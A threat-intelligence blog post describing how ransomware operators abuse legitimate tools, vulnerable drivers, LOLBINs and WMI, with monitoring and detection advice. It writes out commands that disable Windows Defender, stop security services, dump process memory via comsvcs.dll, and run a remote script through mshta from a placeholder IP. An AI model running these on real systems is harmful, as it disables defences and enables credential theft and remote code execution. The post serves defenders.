Ransomware Tactics: Leveraging Legitimate Tools and Advanced Techniques

Ransomware actors have increasingly shifted their tactics, techniques, and procedures (TTPs) to include the use of legitimate commercial and open-source software rather than relying solely on their custom-built webshells or malware. This shift is often referred to as "Bring Your Own Tools" (BYOT), where threat actors use trusted and widely available tools for malicious purposes.

Ransomware Actors' Arsenal: From Webshells to Commercial Tools

Ransomware actors are now using a variety of free, commercial, and open-source software in their attacks. Some of the most commonly used tools include:

• BloodHound: A tool that identifies and exploits misconfigurations in Active Directory environments.

• WinSCP: A popular free SFTP, FTP, WebDAV, and SCP client.

• PoshC2: A command and control framework that is often used for post-exploitation.

• Cobalt Strike: A commercial adversary simulation tool used to emulate advanced threats.

• Brute Ratel: A red-teaming tool designed to evade detection by EDR and AV solutions.

• AdFind: An LDAP query tool used to gather information from Active Directory.

These tools are often utilized by ransomware operators to move laterally, gather intelligence, and escalate privileges within a compromised environment.

The Darknet Marketplace: Where Exploits and Tools Are Sold

If you explore darknet forums, you’ll find that commercial tools like CANVAS, Cobalt Strike, and Core Impact are often available for sale. These tools, originally developed for legitimate purposes such as penetration testing, are being weaponized by ransomware groups to compromise networks.

Example of a Darknet Forum Selling Exploits

BYOT: Bring Your Own Tools

The BYOT approach is now a staple in ransomware campaigns. By utilizing cloud-based file-sharing sites like Google Drive, Dropbox, and Box, threat actors can easily bring these tools into a target environment without raising suspicion. It’s crucial for organizations to block and alert on these domains to prevent such tactics.

Monitoring & Alerting Domains/URLs:

• 7zip: Download

• AdFind: Download

• Advanced IP Scanner: Download

• Angry IP Scanner: Download

• AnyDesk: Download

• Procdump: Download

• Process Hacker: Download

• PsTools/PsExec: Download

• rclone: Download

• WinSCP: Portable | Full

Commonly Accessed GitHub Repositories:

• BloodHound: Releases

• Lazagne: Releases

• Mimikatz: Releases

• PowerSploit/PowerView: Releases

• PowerUp: Releases

• Rubeus: Source | Binary

• Seatbelt: Source | Binary

• SharpView: Compiled

Living Off Trusted Sites (LOTS) Project:

mrd0x maintains the Living Off Trusted Sites (LOTS) Project, cataloging sites used frequently for BYOT, data exfiltration, phishing, and other malicious activities. It’s essential to monitor and alert on such domains to prevent and detect these activities.

Bypassing Security Software

Once attackers gain initial access, they often need to disable security mechanisms to execute their payloads. Disabling real-time monitoring in Windows Defender, for instance, can be done easily if the attacker has admin privileges:

Set-MpPreference -DisableRealtimeMonitoring $True

Unfortunately, many organizations do not monitor for invocations of Set-MpPreference. With the ease of disabling Defender's real-time monitoring, it becomes clear why having a robust backup solution is critical.

Common Bypass Tools & Techniques:

• GMER, Hitman Pro, PC Hunter, Process Hacker: Tools used to disable security mechanisms. Process Hacker, for example, can identify and disable security product services, loaded libraries, and more.

• BYOVD (Bring Your Own Vulnerable Driver): This involves bringing a signed kernel driver into the environment that is vulnerable to attack, providing a low level of access for disabling security mechanisms such as AV, EPP, and EDR services.

Common Drivers Used in Ransomware Attacks:

• aswArPot.sys (Avast)

• gdrv.sys (Gigabyte)

• mhyprot2.sys (Genshin Impact)

DLL Hijacking: Wietze Beukema's Hijack Libs project offers an overview of DLL Hijacking, where legitimate DLLs are replaced or hijacked by malicious actors.

LOLBAS commands:

Rather than use a dedicated tool to find and kill security product services and processes, the LOLBAS commands sc, net, and taskkill can do the job:

1. Service Identification and Termination:

   • sc Command:

     • Example: sc stop [service_name] can be used to stop a specific service.

   • net Command:

     • Example: net stop [service_name] will halt the identified service.

2. Process Identification and Termination:

   • Task Manager and tasklist Command:

     • Once a process is identified, taskkill can be used to stop it.

   • PowerShell Cmdlets:

     • Get-Service/Stop-Service: These cmdlets allow administrators (and attackers) to query and stop services, respectively.

     • Get-Process/Stop-Process: These cmdlets are used to query and terminate running processes.

   
   

LOLBINs & Native Execution Methods

Ransomware actors often use legitimate binaries, also known as LOLBINs (Living Off the Land Binaries), to execute malicious commands:

• regsvr32: Registers DLLs.

• rundll32: Executes functions directly from DLLs.

• bitsadmin: Administers the Background Intelligent Transfer Service (BITS).

• msbuild: CLI compiler for Visual Studio.

• msiexec: Windows Installer for installing programs and tools.

• mshta: Executes HTML Applications (HTA) code.

• winrs and wmic: Used for remote command execution.

• wsl: Windows Subsystem for Linux, abused for execution and persistence.

Example Commands:

1. cmd.exe /k [malicious command]

2. powershell.exe -c rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump   4242 C:\WINDOWS\TEMP full

3. regsvr32 c:\users\public\legit.dll

4. mshta.exe vbscript:Close(Execute("GetObject("script:http://1.1.1.1/not_malicious.sct")"))

Windows Management Instrumentation (WMI)

WMI has been around for many years and is commonly used by ransomware actors for persistence and lateral movement. Below are the key components and methods associated with WMI in ransomware cases:

Key WMI Components:

• wmic.exe: General CLI tool to interact with WMI.

• wmiprvse.exe: Service handling WMI commands, often seen in remote WMI activity.

• wsmprovhost.exe: Runs on the remote host if PSRemoting is used.

• mofcomp.exe: MOF (Managed Object File) compiler used to insert data into the WMI database.

WMI Commands:

wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List

WMI is often used by ransomware actors to launch processes with "Medium" integrity. Some malware calls itself using WMIC via process call create [bad_stuff_here] to elevate privileges on the system.

Detecting WMIC Execution: To detect WMI-based attacks, monitor processes launched by WMIC with medium integrity and unusual invocations.

For detailed WMI analysis, collect the WMI database files located at               %SystemRoot%\System32\Wbem\Repository\.

Enable WMI Tracing:

Wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true

WMI Course: A Deep Dive

I’ve created an in-depth course on WMI, covering its capabilities, stealthy persistence techniques, and how to detect and defend against WMI-based attacks. Check out the full course below:

1. https://www.cyberengage.org/post/part-1-wmi-a-deep-dive-into-its-capabilities-and-stealthy-persistence-techniques

2. https://www.cyberengage.org/post/part-2-wmi-detecting-and-defending-against-wmi-based-attacks

3. https://www.cyberengage.org/post/part-3-wmi-understanding-wmi-event-consumers-in-cybersecurity

4. https://www.cyberengage.org/post/part-4-wmi-the-intricacies-of-mof-files-a-gateway-for-malicious-infiltration-in-wmi

5. https://www.cyberengage.org/post/part-5-wmi-unveiling-the-persistence-of-malicious-mof-files-a-deep-dive-into-pragma-autorecov

6. https://www.cyberengage.org/post/part-6-wmi-hunting-down-malicious-wmi-activity

Akash Patel